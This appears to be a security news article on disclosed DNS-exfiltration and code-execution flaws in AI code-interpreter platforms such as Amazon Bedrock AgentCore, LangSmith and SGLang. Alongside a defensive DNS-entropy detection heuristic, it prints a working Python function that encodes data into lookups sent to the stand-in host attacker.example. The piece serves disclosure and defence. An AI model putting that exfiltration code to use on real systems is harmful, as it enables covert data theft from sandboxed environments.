Cybersecurity researchers have disclosed critical vulnerabilities in major artificial intelligence platforms that enable data exfiltration and remote code execution. The flaws affect Amazon Bedrock AgentCore Code Interpreter, LangSmith, and SGLang, allowing attackers to abuse outbound DNS queries to compromise AI code-execution environments.

According to BeyondTrust researchers, Amazon Bedrock's sandbox mode permits outbound DNS queries that attackers can manipulate to establish interactive shells and steal sensitive data. The vulnerability represents a significant security gap in AI infrastructure that organizations increasingly rely on for processing sensitive information.

The attack method leverages Domain Name System (DNS) queries as a covert channel for data exfiltration from AI environments: stolen data is encoded into the hostnames of outbound lookups, which most sandboxes allow even when other network traffic is blocked. Because these queries look like routine name resolution, attackers can bypass traditional security controls and extract information from what should be isolated execution environments.
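To make the covert channel concrete, the sketch below shows the general encoding step common to DNS exfiltration techniques: data is hex-encoded, split into labels that fit DNS length limits, and prepended to an attacker-controlled domain, where each resulting lookup is logged server-side. The domain `attacker.example` and the chunk size are hypothetical; this is an illustration of the technique class, not the specific exploit the researchers disclosed.

```python
import socket

def encode_queries(data: bytes, domain: str = "attacker.example") -> list[str]:
    """Hex-encode data and split it into DNS-safe labels.

    Each returned name carries a chunk of the payload in its leftmost
    labels; DNS labels are capped at 63 characters, so chunks stay at 60.
    """
    hex_payload = data.hex()
    chunks = [hex_payload[i:i + 60] for i in range(0, len(hex_payload), 60)]
    # A sequence number per chunk lets the receiver reassemble in order.
    return [f"{idx}.{chunk}.{domain}" for idx, chunk in enumerate(chunks)]

def exfiltrate(data: bytes, domain: str = "attacker.example") -> None:
    """Emit one lookup per chunk; the query itself is the channel,
    so resolution failures are irrelevant to the attacker."""
    for name in encode_queries(data, domain):
        try:
            socket.gethostbyname(name)
        except socket.gaierror:
            pass  # NXDOMAIN is expected; the authoritative server saw the query
```

The design point is that the payload travels in the *question* section of ordinary DNS traffic, so no unusual ports or protocols appear at the network edge.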

The research highlights broader security challenges in AI platform architectures, where the need for computational flexibility often conflicts with strict security isolation. Organizations using these platforms should review their AI security postures and implement additional monitoring for unusual DNS activity until patches are deployed.
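One practical form of the DNS monitoring suggested above is to flag queries whose labels are unusually long or high-entropy, since encoded payloads rarely resemble human-chosen hostnames. The thresholds below (40-character labels, 3.5 bits of Shannon entropy) are illustrative assumptions, not vendor guidance, and would need tuning against an organization's baseline traffic.

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character in a string; encoded payloads score high."""
    counts = Counter(s)
    total = len(s)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

def is_suspicious(qname: str, max_label: int = 40,
                  entropy_threshold: float = 3.5) -> bool:
    """Heuristic check for exfiltration-style DNS query names.

    Flags names with any overlong label (chunked payloads) or any
    label whose character distribution looks random (encoded data).
    Thresholds are assumed values for illustration only.
    """
    labels = qname.rstrip(".").split(".")
    if any(len(label) > max_label for label in labels):
        return True
    if max(shannon_entropy(label) for label in labels) > entropy_threshold:
        return True
    return False
```

Run against resolver logs, a filter like this surfaces candidate queries for review; it cannot prove exfiltration on its own, but it narrows the haystack while patches are pending.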

This disclosure underscores the evolving threat landscape around AI infrastructure, as cybercriminals adapt traditional attack vectors to target the growing ecosystem of AI services and platforms that handle increasingly sensitive corporate and personal data.